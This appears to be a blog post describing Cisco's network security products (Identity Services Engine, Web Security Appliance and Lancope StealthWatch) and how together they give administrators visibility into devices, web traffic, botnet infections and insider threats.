Today’s threat landscape is loaded with malicious websites, malware and other risks that attack users every nanosecond of the day. There isn’t a single product available that can guarantee protection from cyber threats. Older solutions leveraging static technologies such as signatures are not good enough. The best approach for dealing with advanced threats is continuously monitoring the entire network through layering security technologies.

Cisco is known for network and collaboration products however Cisco also has a very strong security catalog that extends beyond traditional firewalls and IPS appliances. If I had to summarize Cisco’s core visibility technologies for cyber threats, I would highlight Cisco’s capabilities around Access Control, Web Security and partnership with Lancope for Insider Threats.

Access Control is critical for knowing who and what is accessing your network regardless if it’s the LAN, Wireless or remotely using VPN technology. Cisco Identity Services Engine ISE accomplishes visibility of users accessing the network by leveraging how people authenticate along with profiling what types of devices are being used. The screenshot below shows two users with mobile devices obtaining different levels of wireless access. Cisco ISE can also verify if devices meet specified polies by enforcing posture prior to providing network access meaning ensure Joey’s windows 7 laptop has the latest updates and security applications installed.

Cisco ISE showing Android with Contractor access and iPhone with Employee mobile access

Profiled devices in my home lab. “Apple-Device” is a MACMINI hosting ISE via “VMWare-Device”

Some default profiles for Cisco ISE.

Web Security is crucial for protecting internal users from threats while surfing the public Internet. Cisco Web Security Appliance WSA (previously Ironport) provides visibility of Internet usage as well as security through layered technologies. Network use policies such as denying gambling web content during work hours can easily be enforced through Cisco WSA’s categorized content classes.

Cisco WSA Content Dashboard

The real value of Cisco WSA is going beyond average web content filtering by offering layers of security options that protect users accessing approved content. The first layer is verifying if the web source is a known evil location based on reputation. Reputation can be factors such as where it’s located, how long it’s been up or if it has been marked as a source for malicious activity. If the web source has a safe reputation, WSA scans traffic with a combination of Sophos, McAfee and Webroot engines along with other intelligence looking for malicious behavior. There is also a botnet scanner that sits on a spam port designed to capture users that happen to get compromised and have malware phone home activity from their devices. The botnet scanner is a first step towards identifying insider threats but not good enough.

Cisco WSA Main Dashboard

Cisco WSA Threat Dashboard

True insider threat visibility can only be accomplished by monitoring all internal traffic for threats that can compromise your network through email, web, infected devices or other means. Cisco has partnered with Lancope to give network wide forensic visibility leveraging capabilities that exist within networking products such as routers, switches and firewalls as well as in the datacenter. Administrators can use Lancope’s Steathwatch to see the top 10 threats that range from Data Loss to Botnet infections.

Main Lancope Cyber Security Dashboard

(Top 4 machines infected with botnets)
Ethel’s Windows 7 Workstation With Botnet

Ethel’s Workstation communicating with malicious source

Lancope identifies threats using a combination of reputation and behavior regardless if the threat attempts to hide by throttling, encryption or interact through multiple compromised systems. Some examples are flagging a user dumping large amounts of data to dropbox, communication with known malware web sources, host-to-host reconnaissance and use of obscure ports. Lancope can zero in on a threat by stitching together the entire communication chain meaning an administrator will see a map of all infected devices, how the infection started, who the users are (including Cisco ISE integration), where its spreading and how its sending traffic off the network. Lancope also gives visibility into abusing network resources, unauthorized tunneling and problems in network performance.

Lancope Dataloss Diagram
Malware Propagation Diagram

Purple IP has infected green IP which is probing other systems
Known Botnet Sources via Reputation

Combing Access Control, Web Security and Insider Threat technology gives administrators complete visibility of what is happening on the network. There is a lot of power having reports showing every user and device on the network, how those devices access the public Internet and near real-time analytics on if any of those devices have been compromised. This information can dramatically improve identification and reaction to cyber threats saving time, money and other problems caused by network breaches.

Rating: 0.0/5 (0 votes cast)

2 Comments

Filed under Internet Defense, Network Admission Control, Security Management & Analysis

Tagged as 802.1x, Access Control, anti-virus, botnet, botnets, Cisco, cisco cyber, Cisco NAC, cisco security solutions, cisco web security appliance, Clean Access, Compliance, computer threats, content filter, cyber threat defense, Flow, Guest Server, Home, Identity Services Engine, insider threats, iPad, iPhone, ironport, ISE, ISE.1.1, ISE1.0, ISE1.2, Joey, Joey Muniz, joseph, joseph muniz, LanCope, malicious websites, malware, McAfee, Muniz, NAC, NAC appliance, netflow, network access control, network security, network threats, network visibility, prime, Profiler, reputation security, Security, security with NetFlow, Sophos, Stealth Watch, StealthWatch, top network threats, virtual wsa, virus protection, web reputation, web security, webroot, wsa

Tag Archives: Stealth Watch

Post NAC: Cisco Identity Services Engine (ISE) and Lancope StealthWatch for Total Access Control

Breaking WPA2-PSK with Kali Linux : wireless.

SSL Strip – Breaking Secure Websites

How Hackers Crack Weak Passwords

Verizon’s 2013 Data Breach Investigations Report

5 Steps to Take Right After Suffering a Cyber Security Breach

Defining The Difference Between A Penetration Test, Vulnerability Assessment and Security Audit

Installing Lancope StealthWatch on a Mac mini for Small Lab

Situational Awareness For Cyber Threat Defense

Cisco’s Cyber Solutions – What Is Happening In Your Network

Search

Topics

Cisco ISE Documentation

Subscribe

Blogroll